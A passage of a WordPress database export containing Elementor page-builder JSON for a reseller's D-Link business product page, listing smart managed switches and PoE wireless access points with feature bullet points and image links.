Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7353,3379,'_elementor_version','2.5.14'),(7354,3379,'_elementor_edit_mode','builder'),(7358,3380,'_wp_page_template','template-fullwidth.php'),(7359,3380,'_elementor_template_type','post'),(7360,3380,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"219\",\"right\":\"219\",\"bottom\":\"219\",\"left\":\"219\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link 